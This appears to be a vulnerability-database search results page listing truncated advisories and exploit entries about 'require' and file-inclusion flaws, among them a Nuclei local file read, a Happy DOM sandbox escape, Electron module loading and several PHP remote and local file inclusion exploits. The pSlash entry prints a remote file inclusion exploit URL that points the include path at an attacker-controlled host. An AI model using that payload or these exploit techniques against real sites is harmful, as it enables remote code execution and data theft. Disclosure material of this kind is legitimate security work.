CVE-2026-41646

A flaw was found in Nuclei. A vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files. This can be exploited by an attacker through the require function, bypassing default local file access restrictions, leading to information disclosure...

CVE-2026-41646

Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require function, bypassing the default local file acce...

CVE-2026-41646

Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require function, bypassing the default local file acce...

Nuclei: Local File Read via require() Module Loader Bypass

A vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require function, bypassing the default local file access restriction. Affected Component The issue is in the JavaScript runtime's module loading system. The goja...

Happy DOM: VM Context Escape can lead to Remote Code Execution

Escape of VM Context gives access to process level functionality Summary Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE Remote Code Execution attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted...

[M-02] Denial of Service on failed call Dos

Lines of code Vulnerability details Impact Detailed description of the impact of this finding. External calls can fail accidentally or deliberately, which can cause a DoS condition in the contract. To minimize the damage caused by such failures, it is better to isolate each external call into its...

Prototype Pollution

express-xss-sanitizer is vulnerable to prototype pollution. The vulnerability exists in require function of sanitize.js because it doesn't properly sanitize the user input data which allows an attacker to inject and execute arbitrary javascript...

Local File Inclusion

larvitbase-www is vulnerable to local file inclusion. The package uses an exposed API endpoint that accepts an unvalidated GET parameter to a require function call. This could potentially allow a remote attacker to execute any .js files within the web server. Successful exploitation causes the...

libssh2 out-of-bounds read vulnerability (CNVD-2019-07803)

libssh2 is a client-side C library that implements the SSH2 protocol, which is capable of executing remote commands, file transfers, and providing a secure transmission channel for remote programs. The 'libssh2packetrequire' and 'libssh2packetrequirev' functions in libssh2 have an out-of-bounds...

Electron may insecurely load Node modules

Overview Electron fails to restrict the path for loading Node modules, which may lead to execution of arbitrary JavaScript. Electron is a software framework for developing cross-platformm desktop applications with web technologies, such as HTML, CSS, JavaScript with Chromium and Node.js. Electron...

JVN#00324715: Electron may insecurely load Node modules

Electron is a software framework for developing cross-platformm desktop applications with web technologies, such as HTML, CSS, JavaScript with Chromium and Node.js. Electron is used in applications such as Atom editor, Microsoft Visual Studio Code, etc.. Electron contains a flaw where the search...

PHP file include vulnerability analysis-vulnerability warning-the black bar safety net

One, What is”remote file inclusion vulnerability”for? The answer is: the server through the php properties of a function to contain any files, since you want to include this file source filter is not strict, so can go to that contains a malicious file and we can construct the malicious file to...

PHP file include vulnerability details(including the truncated method)-vulnerability warning-the black bar safety net

One, what is”remote file inclusion vulnerability”for? The answer is: the server through the php properties of a function to contain any files, since you want to include this file source filter is not strict, so can go to that contains a malicious file and we can construct the malicious file to...

php execution vulnerability parsing-vulnerability warning-the black bar safety net

A code to perform the function In PHP you can execute the Code of the function. Such as eval , assert , the“and system and exec and shellexec and passthru and escapeshellcmd and pcntlexec , etc. demo code 1.1: ? php echo dir; ?& gt; The second file contains the code injection The file containing...

PHP code execution vulnerability references summary-vulnerability warning-the black bar safety net

A code execution function In PHP you can execute the Code of the function. Such as eval , assert , theand system and exec and shellexec and passthru and escapeshellcmd and pcntlexec , etc. demo code 1.1: The second file contains the code injection The file containing the function in the specific...

TinyWebGallery 1.7.6 Local File Inclusion

?php / ----------------------------------------------------------- TinyWebGallery = 1.7.6 LFI / Remote Code Execution Exploit ----------------------------------------------------------- author...: EgiX mail.....: n0b0d13satgmaildotcom link.....: http://www.tinywebgallery.com/ details..: this...

iDB 0.2.5pa SVN 243 (skin) Local File Inclusion Exploit

Exploit for unknown platform in category web applications ======================================================= iDB 0.2.5pa SVN 243 skin Local File Inclusion Exploit ======================================================= !/usr/bin/env LOTFREE 2009 - lotfree.next-touch.com Local require...

pSlash 0.7 - 'lvc_include_dir' Remote File Inclusion

pSlash v0.7 lvcincludedir Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require$lvcincludedir.'db/dbmysql.inc.php'; Exploit: http://www.site.com/path/modules/visitors2/include/config.inc.php?lvcincludedir=http://evilscripts? Greetz: str0ke, Ironfist,...

PAJAX < 0.5.2 Multiple Vulnerabilities

The remote host is running PAJAX, a PHP library for remote asynchronous objects in JavaScript. The version of PAJAX installed on the remote host fails to validate input to the 'pajax/pajaxcalldispatcher.php' script before using it in a PHP 'eval' function. An unauthenticated attacker can exploit...

Design/Logic Flaw

TYPO3 3.7.1 allows remote attackers to obtain sensitive information via a direct request to 1 thumbs.php, 2 showpic.php, or 3 tables.php, which causes them to incorrectly define a variable and reveal the path in an error message when a require function call fails...